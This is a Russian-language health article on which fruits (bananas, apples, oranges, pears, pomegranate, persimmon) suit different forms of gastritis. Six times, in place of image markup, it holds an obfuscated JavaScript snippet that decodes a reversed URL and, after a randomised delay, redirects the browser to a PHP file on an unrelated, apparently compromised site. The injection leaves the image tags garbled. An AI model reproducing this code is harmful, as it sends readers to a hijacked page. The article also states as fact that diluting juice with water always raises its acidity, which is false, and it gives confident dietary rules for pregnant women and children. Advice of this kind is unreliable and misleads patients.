Какие фрукты полезны при гастрите и как их правильно употреблять

Гастрит всегда связан с вынужденным ограничением в меню больного, и именно поэтому грамотное употребление фруктов при этом заболевании приносит несомненную пользу: ускоряет восстановление слизистой, обеспечивает организм необходимой дозой витаминов, а также нормализует деятельность кишечника.

Бананы при проблемах с ЖКТ

Каждый фрукт, как и любое другое блюдо,  имеет свои показания, и может принести пользу при определённых формах заболевания. Только бананы являются универсальным продуктом при любой форме гастрита. Обладают выраженным смягчающим и обволакивающим эффектом. Рекомендуется съедать за 5-10 минут до каждого приёма пищи по одному банану. Их можно беременным, маленьким детям, кормящим мамам.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/01/1.jpg» alt=»Бананы лежат на столе» width=»640″ height=»438″ /> Бананы можно есть при любой форме гастрита

Употребление свежих яблок

Кислые сорта яблок показаны при гастрите с пониженной кислотностью, особенно при вздутии, газообразовании и других диспептических проявлениях заболевания. При гипоацидной форме гастрита хорошим яблоком можно завершать любой приём пищи. Кожуру необходимо счищать при любой форме заболевания, чтобы избежать механического раздражении слизистой желудка.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/01/1-2.jpg» alt=»Яблоко в руках человека» width=»584″ height=»438″ /> Свежие яблоки необходимо употреблять с осторожностью

При гастрите с повышенной кислотностью яблоки можно только в период ремиссии, с целью нормализации стула и витаминизации. В некоторых источниках указывается, что при этой форме гастрита можно есть сладкие яблоки – это не так. Любое, даже самое сладкое яблоко – повышает кислотность желудка.

Яблоки в фазе ремиссии

Яблоки очищаются от шкурки, делается пюре из 4-5 фруктов. Употреблять по 2-3 столовых ложки перед едой, кроме ужина. Яблоки берём свежие, только местного производителя — во избежание провоцирующих факторов, а также адекватного содержания полезных веществ.

Беременным яблоки показаны как отличный источник клетчатки: улучшает пассаж пищи, снижает газообразование, улучшает цвет лица. Детям яблоки показаны в виде пюре с 6 месяцев, по согласованию с педиатром.

При язве желудка и других эрозивных формах гастрита – яблоки противопоказаны!

Апельсины при гипоацидном гастрите

Апельсины – прекрасное средство для укрепления жизненного тонуса и замедления старения. Из-за высокой кислотности этого продукта его нельзя применять при гиперацидном гастрите, а также при эрозивных формах заболевания.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/01/3.jpg» alt=»Нарезанные плоды апельсина» width=»701″ height=»438″ /> Апельсины стоит употреблять при пониженной кислотности желука

Зато при пониженной кислотности  – апельсины незаменимы:

  • стимулируют регенерацию тканей, обладают выраженным антиоксидантным эффектом;
  • укрепляют сосудистую стенку, что снижает риск развития язв и желудочных кровотечений при гастрите;
  • снижают вязкость крови, что уменьшает интоксикацию и способствует укреплению организма в целом;
  • нормализуют уровень холестерина, что является несомненным плюсом при наличии заболеваний желудочно-кишечного тракта;

Беременным, а также кормящим женщинам апельсины противопоказаны, поскольку являются достаточно сильным источником tomy.ru/allergicheskij-dermatit»>аллергии. По этой же причине их нельзя детям до 3х лет.

Грушу употребляйте смело!

Обладает тонизирующим, общеукрепляющим, вяжущим эффектом. Кроме достаточно большой дозы витаминов, груши содержат много пектиновых веществ, а также обладают антибактериальной активностью. Последнее свойство позволяет их рекомендовать при гастрите, инициированном h. pylori.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/01/1-4.jpg» alt=»Несколько груш лежат на столе» width=»571″ height=»438″ /> Не бойтесь употреблять грушу при гастрите

При гипоацидном гастрите груши можно употреблять достаточно свободно, с учётом общего воздействия фрукта на пищеварение (стимулирует перистальтику, что может привести к поносу). При гастрите с повышенной кислотностью, а также эрозивном гастрите – показано не более 1-2 плода в день.

Груши существенно улучшают настроение, что хорошо при гастрите, который ассоциирован с хронической депрессией.

Беременным груши не противопоказаны, но кушать их нужно с осторожностью, из-за выраженного влияния фрукта на кишечник.

Детям с гастритом – груши показаны только при согласовании с педиатром. В день можно не более 1 фрукта.

Свойства граната

Прямо противопоказан при язве желудка и гиперацидном гастрите. Нельзя принимать даже в разбавленном виде при данных патологиях.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/01/1-5.jpg» alt=»Зерна граната» width=»650″ height=»436″ /> Гранат хорошо подойдёт при гипоацидном гастрите

А Вы знали? Мнение о том, что при разбавлении сока понижается кислотность – ошибочное, и базируется на отсутствии элементарных знаний химии. При разведении водой кислотность фруктовых соков всегда повышается.

При гипоацидном гастрите – отличное средство для стимуляции и восстановления слизистой. Сок граната содержит ударную дозировку всех необходимых витаминов и микроэлементов.

Беременным и кормящим – гранат можно с осторожностью, является аллергенным фруктом. Гранат у беременных может вызывать запоры.

Детям гранат рекомендован при одном из частых осложнений гастрита — анемии, как источник железа.

Как есть хурму?

Единого мнения о роли хурмы нет. Считается, что вяжущее действие фрукта компенсирует гиперацидный гастрит в подострой стадии, однако определённых рекомендаций на этот счёт нет.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/01/1-6.jpg» alt=»Плоды хурмы лежат на столе» width=»596″ height=»438″ /> При гастрите можно кушать только спелую хурму, которая не вяжет

Фрукт обладает хорошим вяжущим действием, употреблять его следует только спелым в сочетании с другой пищей.

Беременным можно употреблять только мякоть, не более 1 фрукта в сутки. У детей хурма часто провоцирует расстройство из-за высокого содержания дубящих веществ, поэтому при гастрите у детей младшего возраста – не рекомендована.

Добавление в меню фруктов – полезная мера при гипоацидной форме гастрита. В остальных случаях – необходима консультация лечащего врача.

Adblock
detector